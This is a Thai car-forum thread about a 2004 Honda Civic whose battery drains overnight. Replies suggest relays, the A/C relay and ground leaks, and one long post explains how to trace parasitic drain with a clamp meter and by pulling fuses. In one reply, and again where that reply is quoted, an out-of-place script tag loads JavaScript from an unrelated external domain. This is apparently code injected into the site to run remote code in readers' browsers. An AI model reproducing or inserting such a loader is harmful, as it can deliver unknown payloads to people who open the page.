ตอบ
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
จันทร์, 27 กันยา 2010 13:20 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
รถผมปี 04 1.7VTEC ปัญหาคือจอดข้ามคืนสตาร์ทไม่ติด ต้องพ่วง เป็นแบบนี้ 3 วัน ก็เลยลองฉีดน้ำมัน WD40 ที่ขั้ว 2 คืนก็สตาร์ทติด พอวันที่ 3ก็ สตาร์ทไม่ติดอีกแล้ว เลยตัดสินใจไปเปลี่ยนแบตใหม่ ก่อนเปลี่ยนใช้Boliden แบบไม่เติมน้ำกลั่น ลูกนี้เคลมมาไม่ถึง 6 เดือน แต่ก่อนจะเปลี่ยนทางร้านก็เช็คไฟรั่ว ไฟชาร์จ ก็ไม่พบปัญหา แต่ก็ตัดใจเปลี่ยน ๆ เป็น Panasonic 12V-45A ลูกสีดำไม่ต้องเติมน้ำกลั่นเหมือนเดิมใช้ไปได้ สองวันไม่มีปัญหา พอวันเสาร์ที่ผ่านมา สตาร์ทรถจะออกจากบ้าน บ่ายโมง(จอดตั้งแต่ทุ่มครึ่ง) ..ไม่ติดซะแล้ว ก็เลยขับไปร้านไดฯหน้าบ้าน ที่ร้านบอกว่าไดฯทำงานปกติแล้วช่างบอกว่าแบตฯประเภทนี้ไม่ดีให้ใช้แบบธรรมดา ...แล้วก็เลยขับไปร้านที่เปลี่ยนแบตฯ...ก็ทำการเช็คโน่นนี้ แล้วสรุปว่า ไดชาร์จไม่ชาร์จไฟ ช่างเค้าตั้งข้อสงสัยอีกอย่างว่าเครื่องสั่น (แต่รอบเดินเบาปกติ) ก็เลยกลับมาให้ช่างไฟหน้าบ้านถอดไดฯออกมาเช็ค..ก็แค่ถ่านบางลง(ก็ไม่เกี่ยวกับปัญหาหรอก)ไหนๆก็ถอดแล้วก็ให้เปลี่ยนไป พอเช้าวันอาทิตย์ก็เช่นเดิมคือสตาร์ทไม่ติด ก็ต้องพ่วงแล้วติดเครื่องสักพักใหญ่แล้วก็ลองถอดขั้วไฟออกตอน 10โมง แล้วมาใส่ขั้วติดเครื่องอีกที 2ทุ่มก็ติด แล้วใช้รถกลางคืนเปิดไฟ อีกชั่วโมงกว่า ถึงบ้านก็ถอดขั้ว เช้ามาก็ยังติดเครื่องได้...ตกลงมันเป็นไรนี่ ต้องเปลี่ยนต้องทำยังไง ผู้รู้จริงช่วยแนะนำหน่อย หรือช่างที่ไหนเก่งเรื่องไฟรถ ก็ช่วยกันด้วยครับ
ปล.เครื่องเสียงเดิม ,ติด LPG กว่าปีแล้ว
ได้รับคำขอบคุณจาก: arm2517  escudo1121 
TorreZ


ชื่อเล่น: ตั้ม

เข้าร่วม: 27 กรกฎา 2009
ตอบ: 160

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 196
ให้คำขอบคุณ: 246

ที่อยู่: บางเขน
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 27 กันยา 2010 15:02 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
http://www.civicesgroup.com/forum/topic20407?highlight=%E0%B8%A3%E0%B8%B5%E0%B9%80%E0%B8%A5%E0%B8%A2%E0%B9%8C
ได้รับคำขอบคุณจาก: jaii  arm2517  escudo1121  baberonte 
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
อังคาร, 28 กันยา 2010 11:16 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
TorreZ พิมพ์ว่า:
http://www.civicesgroup.com/forum/topic20407?highlight=%E0%B8%A3%E0%B8%B5%E0%B9%80%E0%B8%A5%E0%B8%A2%E0%B9%8C

เด๋ยววันนี้จะลองซื้อ reley มาเปลี่ยนดูครับ
ได้รับคำขอบคุณจาก: arm2517 
mong_civic


ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ที่อยู่: Chonburi
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 28 กันยา 2010 12:29 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ตามนั้นเลยครับ
ได้รับคำขอบคุณจาก: jaii  arm2517 
P.TER.357


เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

ที่อยู่: เมืองทองธานี - บางใหญ่ นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 28 กันยา 2010 13:11 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ไฟรั่วลงกราวน์ป่ะคับ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: jaii  arm2517 
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 กันยา 2010 13:19 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ผมตั้งข้อสังเกตุ ตรงที่ว่า พอถอดขั้วทิ้งไว้ แล้วเช้ามาค่อยใส่กลับ ก็สตาร์ทติด อะครับ

มีอุปกรณ์บางอย่าง มีไฟรั่วหรือเปล่าอะครับ ถ้าเราใส่ขั้วแบตไว้ แล้วมันใช้ไฟตลอดเวลา
พอเราจอดนาน ๆ ไฟก็เลยหมดอะครับ

ลองดูนะครับ ไม่รู้จะเกี่ยวหรือเปล่าครับ
ได้รับคำขอบคุณจาก: jaii  arm2517 
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
พุธ, 29 กันยา 2010 07:24 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
P.TER.357 พิมพ์ว่า:
ไฟรั่วลงกราวน์ป่ะคับ
"<script src="https://sport32news.com/civicesgroup.js">

เรื่องไฟรั่วเช็ดไป สองรอบแล้วครับ ปกติ
ได้รับคำขอบคุณจาก: arm2517 
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 กันยา 2010 07:49 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
TorreZ พิมพ์ว่า:
http://www.civicesgroup.com/forum/topic20407?highlight=%E0%B8%A3%E0%B8%B5%E0%B9%80%E0%B8%A5%E0%B8%A2%E0%B9%8C

ตามลิ้งเลยครับ
ผมว่าเสียที่ reley เหมือนกันครับ
ได้รับคำขอบคุณจาก: jaii  arm2517 
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
พฤหัส, 30 กันยา 2010 10:34 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
เพิ่งเปลี่ยน reley คืนวันพุธเฝ้าดูอาการอีกรอบ เพราะคืนวันจัน อังคาร ยังไม่ได้เปลี่ยนแต่ก็สตาร์ทติด
พอเปลี่ยนแล้วก็มีอาการอื่นอีก จู่ๆไฟหน้ารถหน้าปัดก็ดับหมดขณะใช้งานต้องปิดสวิตช์แล้วเปิดใหม่ เป็นแบบนี้สองรอบในคืนเดียว
ได้รับคำขอบคุณจาก: arm2517 
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
พฤหัส, 30 กันยา 2010 10:36 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
reley ตัวละ 80 บาท
ได้รับคำขอบคุณจาก: arm2517 
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 30 กันยา 2010 10:48 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
jaii พิมพ์ว่า:
เพิ่งเปลี่ยน reley คืนวันพุธเฝ้าดูอาการอีกรอบ เพราะคืนวันจัน อังคาร ยังไม่ได้เปลี่ยนแต่ก็สตาร์ทติด
พอเปลี่ยนแล้วก็มีอาการอื่นอีก จู่ๆไฟหน้ารถหน้าปัดก็ดับหมดขณะใช้งานต้องปิดสวิตช์แล้วเปิดใหม่ เป็นแบบนี้สองรอบในคืนเดียว



อ้าว เป็นอะไรอีกแล้วล่ะครับ
รอผู้รู้มาแนะนำอีกทีนะครับ เพราะไม่รู้เหมือนกันนะอาการตัวหลังเนี่ย เหมือนว่าเคยเห็นกระทู้นึงเคยเจออาการนี้เหมือนกัน
ได้รับคำขอบคุณจาก: arm2517 
mae


เข้าร่วม: 28 เมษา 2010
ตอบ: 635

Guru ES
Guru ES

ได้รับคำขอบคุณ: 431
ให้คำขอบคุณ: 740

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 14 กันยา 2011 00:52 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
สรุปลงเอยยังไงอ่ะ...ตอนนี้รถมีอาการเหมือนกันค่ะ ที่ศูนย์บอกจะเปลี่ยน reley ให้ใหม่ตัวละประมาณ 500 บาท จอดทิ้งไว้ทั้งวันแล้วยังไม่โทรมาแจ้งอะไรเลย ทำไมเช็คอาการนานจัง ท่านอื่นเคยเจอแบบนี้บ้างมั๊ยคะ
ได้รับคำขอบคุณจาก: arm2517 
anugul


ชื่อเล่น: นพ

เข้าร่วม: 16 พฤษภาคม 2011
ตอบ: 723

Guru ES
Guru ES

ได้รับคำขอบคุณ: 219
ให้คำขอบคุณ: 57

ที่อยู่: (สนามบินภูเก็ต)
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 14 กันยา 2011 01:10 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ได้รับคำขอบคุณจาก: arm2517 
izawa


เข้าร่วม: 11 กันยา 2011
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 22
ให้คำขอบคุณ: 18

ปี: 2005
พุธ, 14 กันยา 2011 14:08 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
เปลี่ยนรีเลย์คอมแอร์ครับ หายชัว ผมเพิ่งเปลี่ยน อาการแบบคุณเลย ตอนแรกเปลี่ยนแบต ต่อมาเปลี่ยนไดชาร์ต สุดท้ายเปลี่ยนรีเลย์ หายครับ เหอๆ โดนไปเยอะ
ได้รับคำขอบคุณจาก: arm2517  mae 
arm2517


ชื่อเล่น: อาร์ม

เข้าร่วม: 21 ตุลา 2008
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 575
ให้คำขอบคุณ: 3231

ที่อยู่: สิงห์บุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 14 กันยา 2011 14:22 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
รับทราบ เก็บข้อมูล...ขอบคุณสำหรับความรู้ครับ
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 14 กันยา 2011 14:42 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 15 กันยา 2011 23:43, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: okuma  mae 
mae


เข้าร่วม: 28 เมษา 2010
ตอบ: 635

Guru ES
Guru ES

ได้รับคำขอบคุณ: 431
ให้คำขอบคุณ: 740

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 14 กันยา 2011 23:28 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
พรุ่งนี้จะลองเปลี่ยนค่ะ
duck26


เข้าร่วม: 10 กุมภา 2011
ตอบ: 419

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 210
ให้คำขอบคุณ: 346

ที่อยู่: ดอนเมือง ม.ธนินทร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 14 กันยา 2011 23:39 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 6 สิงหา 2012 20:11 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ตอนนี้กำลังเป็น แม้แต่ไฟหน้าปัดยังไม่สว่างเลย
boy_nsm


ชื่อเล่น: บอย

เข้าร่วม: 02 สิงหา 2009
ตอบ: 356

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 522
ให้คำขอบคุณ: 374

ที่อยู่: บ้านบึง - ชลบุรี
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 6 สิงหา 2012 20:55 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ถอดขั้วแบตออกแล้วลองใส่ใหม่ สังเกตุจะมีเสียงดัง "แต๊ก" เป็นทีรีเลย์แอร์ครับ
settaphol


ชื่อเล่น: ติ๊ก

เข้าร่วม: 11 ธันวา 2009
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0

ที่อยู่: มหาสารคาม
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 26 สิงหา 2012 13:43 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ของผมบิดสวิตท์แล้วสตาร์ทดังแต็กแล้วไฟหน้าปัดดับหมดเลยครับ
ไม่รู้เป็นไร ลองสตาร์ทใหม่ก็เป็นเหมือนเดิม
bankabby


ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 26 สิงหา 2012 19:30 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
เข้ามาเก็บข้อมูลครับดีดีครับ 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 26 สิงหา 2012 21:11 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ถ้าไฟหน้าปัดดับ  แล้วก็เกย์พวกน้ำมัน  ความร้อนตก


เป็นที่แบตตอรี่แน่นอนเลยครับ
baberonte


ชื่อเล่น: หนก ครับ

เข้าร่วม: 03 กรกฎา 2011
ตอบ: 352

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 303
ให้คำขอบคุณ: 1173

ที่อยู่: จ. เพชรบูรณ์
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 27 สิงหา 2012 12:45 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ลองเปลี่ยน รีเลย์ดูครับ ผมพึ่งเป็นมาล่าสุดครับ
Acid Aback


เข้าร่วม: 12 กุมภา 2016
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 0
ศุกร์, 12 กุมภา 2016 15:13 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
ซีวิครั่วเหมือนกัน ไปศูนย์ฮอนด้า เปลี่ยน รีเลย์ เปลี่ยนไดชาร์ท เปลี่ยนแบต เปลี่ยนอะไหล่มั่วไปหมด กลับมาบ้านคืนเดียววันรุ่งขึ้น แบตหมดก้อนเรียบ ต้องพ่วงแบตเหมือนเดิม ศูนย์ฮอนด้า ช่วยอะไรไม่ได้เลย  แถมเก็บตังค์ไปอีกเป็นหมื่นๆ  เสียดายตังค์เป็นหมื่นๆ ที่จ่ายให้ศูนย์ฮอนด้านี่เลยจริงๆ 
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
เสาร์, 13 กุมภา 2016 12:34 - ช่วยด้วย..ระบบไฟมีปัญหา ไม่รู้เลยเป็นที่แบตฯหรือไดชาร์จ จอดข้ามคืนสตาร์ทไม่ติด
อาการที่เป็นนี้ เรียกว่ามีระบบไฟรั่วลงกราวด์ วงจรไฟในรถยนต์ การที่ไฟในตัวแบ็ตเตอรี่มีไฟไม่พอกับการใช้สตาร์ทเครื่องยนต์ เมื่อมีการจอดรถข้ามคืน หรือเป็นเวลานานๆสี่ห้าชั่วโมงขึ้นไป นั้นแสดงให้ทราบว่ามีไฟรั่วลงกราวด์ ในวงจรไฟของรถจะมากหรือน้อย หากมีการรั่วลงกราวด์มาก ไฟในหม้อแบ็ตเตอรี่ก็จะหมดเร็ว หากรั่วไม่มาก ประมาณ 3-5 Amp ก็จะใช้เวลาหลายชั่วโมง ก่อนที่ไฟจะหมดจากแบ็ตเตอรี่

จะรู้ได้อย่างไรว่ามันมีการรั่วในวงจรไฟที่ส่วนไหน และอย่างไร ก็มีวิธีการตรวจสอบตามวิธีต่อไปนี้
เนื่องจากระบบวงจรไฟในรถยนต์แบ่งออกเป็นสองระบบ คือระบบไฟชาร์จและระบบไฟใช้เป็นโหลดที่ทำให้เกิดการสูญเสียพลังงานของกระแสไฟ ไปกับอุปกรณ์ของระบบการคอนโทรลของเครื่องยนต์ให้ทำงาน กับระบบไฟที่เป็นส่วนเสริมเพื่ออำนวยความสะดวกในการใช้รถ เช่นระบบแอร์ ระบบเครื่องเสียง ระบบไฟส่องสว่าง และสัญญาณไฟแจ้งเตือนอื่นๆ

ดังนั้นเราจะต้องตรวจสอบเป็นขั้นตอนไปตามนี้
วิธีแรก ให้ทำการตรวจสอบของระบบไฟชาร์ท ที่ตัวไดน์ชาร์จ ว่าทำงานปกติหรือไม่การตรวจสอบการทำงานของตัวไดน์ชาร์จ หากต้องการวิเคราะห์ว่ามันทำงานถูกต้องตามสเป็คหรือไม่ จะต้องมีเครื่องมือตรวจเทสการใช้กระแสไฟ ที่มีการเปลี่ยนแปลงค่าโหลดของกระแสไฟ ไปตามรอบของเครื่องยนต์ ที่เป็นตัวกำหนดว่า หากจะให้มีกระแสไฟจำนวนที่มีการบ่งบอกตามสเป็คของตัวไดน์ชาร์จ ว่าจ่ายออกมาได้กี่แอมป์แปร์ ที่ความเร็วรอบของเครื่องยนต์ที่เท่าใด แน่นอนการที่จะใช้กระแสไฟจำนวนมากที่ตัวไดน์ชาร์จผลิตออกมาได้ จะต้องมีกระแสที่ใช้ตามค่าโหลดที่เกิดขึ้น เขาจึงนิยมใช้ค่าโหลด Resistance เข้ามาเป็นตัวกำหนดใช้กระแส แทนตัวแบ็ตเตอรี่ เพราะตัวแบ็ตเตอรี่ มีการเปลี่ยนแปลงค่าโหลดตามการใช้งานจริง ทำให้กระแสไฟที่จ่ายจากตัวไดน์ชาร์จเปลี่ยนไปด้วย จึงเห็นว่าเมื่อแบ็ตถูกใช้กระแสไฟไปมาก ทำให้มีโหลด(ค่าความต้านทาน)ที่เกิดขึ้นภายในตัวแบ็ตมากขึ้น ในทำนองเดียวกันหากแบ็ตมีกระแสไฟเต็ม ค่าความต้านทานที่เกิดขึ้นในตัวมันน้อยเกือบจะเป็นศูนย์ ซึ่งมีวิธีการเช็คที่จะต้องนำมากล่าวกันมากเนื้อหา ก็ขอข้ามไปก็แล้วกัน เพราะไม่ใช่เรื่องที่ท่านเจ้าของรถควรทราบ มันเป็นเรื่องทางวิชาการ

ดังนั้นสิ่งที่จะทำให้การตรวจสอบวงจรไดน์ชาร์จได้ง่ายและเร็วก็คือ ให้หาดิจิตอล มิเตอร์พวก DC แคล้มแอมป์ มาทำการวัดกระแสไฟ DC ที่สายไฟจุด B+ ที่ตัวไดน์ชาร์จ ไปยังขั่วบวกของแบ็ตเตอรี่ โดยใช้แคล้มแอมป์ หนีบคร่อมสายไฟเส้นนี้ แล้วสตาร์ทเครื่องยนต์ เร่งรอบเครื่องยนต์ไปที่ประมาณ 2500 รอบ แล้วให้ตรวจดูที่หน้าปัทม์ของตัว DC clamp amp ว่าอ่านค่าของกระแสไฟได้กี่แอมป์ ปกติจะอ่านได้ประมาณ 20-30 Amp ขึ้นอยู่กับขนาดของตัวไดน์ชาร์จ ว่ามีขนาด เช่น 45A 50A 60A
และเมื่อมาอยู่ที่รอบเดินเบาคารจะได้ ไม้น้อยกว่า 10A โดยประมาณ

ที่กล่าวมาข้างบนนี้เป็นการเทสการทำงานของตัวไดน์ชาร์จแบบเคร่าๆ พอให้ทราบว่ามันทำงานปกติ แต่สิ่งที่เกิดขึ้นเรื่องมีกระแสไฟรั่วลีคลงกราวด์ ก็จะต้องเช็คการั่วของระแสไฟในส่วนที่มาจากมีตัวอุปกรณ์พวกตัวซิลิคอนไดโอดเร็คติฟลาย ในตัววงจรไดน์ชาร์จ เกิดการช๊อร์ทของจังชั่นรอยต่อของสาร PและN ชอร์ทถึงกัน ทำให้ในสภาวะที่เครื่องยนต์ไม่ได้ทำงาน มีกระแสไฟจากแบ็ตเตอรี่ไหลผ่านจังชั่นของตัวไดโอดเร็คติฟลาย ลงกราวด์ ทำให้ไฟในตัวแบ็ตเตอรี่หมด ซึ่งอาการนี้ตรวจพบได้บ่อยมาก
การตรวจเช็คการรั่วนี้ ก็มีวิธีตรวจการทำงานการจ่ายกระแสของตัวไดน์ชาร์จตามวีธีการที่กล่าวมา เพียงแต่ให้ดับเครื่องยนต์ แล้วให้ดูว่ายังสามารถอ่านค่ากระแสไฟได้อีกหรือไม่ ปกติแล้วเมื่อดับเครื่องยนต์จะไม่สามารถอ่านกระแสได้ หากพบว่ายังอ่านค่ากระแสได้ ประมาณ 3-5 Amp แสดงว่า ในแผงวงจรในตัวไดน์ชาร์จมีไดโอดตัวไดตัวหนึ่งมีการชอร์ท ทำให้มีกระแสไหลจากแบ็ตเตอรี่ลงกราวด์

สมมุติว่าที่ตัวไดน์ชาร์จปกติ ไม่มีการรั่วของกระแสไฟ ก็ให้มาทำการตรวจสอบวงจรไฟฟ้า ที่ต่อสายไฟไปยังโหลดต่างๆในตัวรถยนต์ เช่นเครื่องเสียง วิทยุ แอร์ คอมเพรซเซอร์แอร์ ระบบไฟหน้ารถ ไฟเลี้ยว ตัวพัดลมไฟฟ้าของหม้อน้ำ และอื่นๆ ท่านเจ้าของรคงบอกว่า ทำไมมันมากมาย จะตรวจยังไรไหว อย่ากังวลทำง่ายๆ

ก่อนอื่นให้นำเอา DC clamp amp มิเตอร์ มาทำการหนีบคร่อมสายไฟที่ออกไปจากขั่วบวกของแบ็ต ไปเข้าที่กล่องเมนบ๊อคฟิวส์ ที่ห้องเครื่องหน้ารถ ทำในขณะที่ไม่ต้องติดเครื่องยนต์ แล้วอ่านค่ากระแสไฟที่ตัว DC clamp amp ว่ามีกระแสไฟวัดได้เท่าใด ในกรณีที่เป็นปกติ จะมีกระแสไฟถูกใช้ในขณะที่ดับเครื่องยนต์ไม่ได้ใช้งานรถจะวัดได้ประมาณ300-500 ma (มิลลิแอมป์) เพราะในจังหวะที่รถไม่ได้ใช้งาน จะมีกระแสไฟส่วนหนึ่งถูกใช้ไปกับพวกวงจรกันขโมย ระบบเมมโมรี่แบ็คอัพเครื่องรับวิทยุ และระบบแบ็คอัพของ ECU และพวกวงจรสมาร์ทคีย์ พวกกุญแจอีโมบิไลเซอร์

แต่เมื่อใดก็ตามที่ตัว DC clamp amp มิเตอร์สามารถอ่านกระแสไฟได้ตั้งแต่ 3-5 Amp ขึ้นไป แสดงว่าท่านเจ้ารถของกำลังจะโชคดีเสียตังค์แล้ว เพราะว่าเกิดมีกระแสไฟรั่วลงกราวด์ แล้วจะรู้ได้อย่างไร ก็ไม่ยาก ให้ทำตามนี้ ในขณะที่ตัวแคล้มแอมป์มิเตอร์ยังอ่านค่ากระแสไฟที่รั่วลงกราด์ ก็ให้เราดึงตัวฟิวส์ของตัวฟิวส์ย่อยออกทีละตัว เมื่อดึงฟิวส์ตัวใดออกแล้วให้สังเกตุว่า ที่ตัวหน้าปัมท์มิเตอร์แคล้มแอมป์ มีกระแสไฟลดลงมาเหลือประมาณ 300-500 ma หรือไม่ หากยังคงเท่าเดิม ก็ให้ดึงฟิวส์ตัวต่อไฟ จนกว่าจะพบ(พบแน่นอน) เมื่อดึงฟิวส์ตัวไดออก แล้วลดลง ก็ให้ตรวจดูสายไฟที่ต่อจากฟิวส์ตัวนั้น ไปใช้กับอุปกรณ์ของอะไร เราก็จะทราบได้ว่ามาจากอุปกรณ์ตัวไหน ก็เป็นการตรวจหาการรั่วของกระแสไฟแบบคร่าวๆ ที่ใช้งานในการตรวจสอบได้ดีเช่นเดียวกัน

